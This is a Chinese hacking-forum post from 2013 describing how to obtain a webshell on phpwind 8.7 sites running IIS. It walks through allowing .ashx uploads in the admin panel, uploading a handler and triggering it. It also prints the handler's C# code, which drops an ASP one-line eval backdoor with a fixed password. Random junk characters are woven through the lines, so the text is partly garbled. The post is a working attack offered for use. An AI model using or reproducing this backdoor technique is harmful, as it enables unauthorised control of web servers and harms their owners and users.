找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1971|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小& `+ e: Y" R; k. `. l9 u
7 N# j3 L) X! G8 F2 F
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx7 Z1 K# O4 E+ D
) }6 T5 q; u/ ]9 {3 s/ ]
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整- j' i) W) K2 n7 D$ g! Z6 w, R' }$ T
; X4 [+ K* M2 `
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
; B) q) L) `1 M/ z
- o8 C0 e/ x3 I+ V4 \打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
5 s6 J$ y/ i- g 2 f3 \) o6 i8 a) d; C
下面是代码:
) T7 j" o* U+ H9 d / t; j' S5 K3 M" b* [
<%@ WebHandler Language="C#"Class="Handler" %>
+ v# o" A/ O7 \using System;
' |$ ?$ R" O2 ?# g: [7 Tusing System.Web;( U7 \+ w; ^# W1 ]7 c0 P
using System.IO;% V! J. A/ Q7 `. u, s" ?! b
public class Handler : IHttpHandler {% Y/ @+ R( z0 Q: Y8 M0 i
public void ProcessRequest (HttpContext context) {/ l( G( }6 N/ D; |/ B- u. L- t
context.Response.ContentType = "text/plain";
" ], c, c5 j5 w6 u* d+ t: h# oStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
- q% |. b! o7 ufile1.Write("<%eval request(\"r00ts\")%>");
9 j$ \: D! H) o+ {( j! [1 cfile1.Flush();
$ T* S. a" @* t% p9 k; _file1.Close();
9 o$ A8 c% a7 F9 v  {5 R0 \. p}
% l& v- u- u9 q  mpublic bool IsReusable {( Q, N# T1 ^! ]# ~% k5 n6 ]1 J5 h
get {% q6 K" J  M# d/ i0 W$ c$ x; J+ x  w
return false;( A4 U  P/ ?, J# ~" T: W! G
}3 e5 }: u' e$ G- n, `) n1 R% \" M' l
}) y# W: x0 z* S0 z/ c
}0 N2 |" U6 j0 a2 V$ T1 V9 ?% k  O+ O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表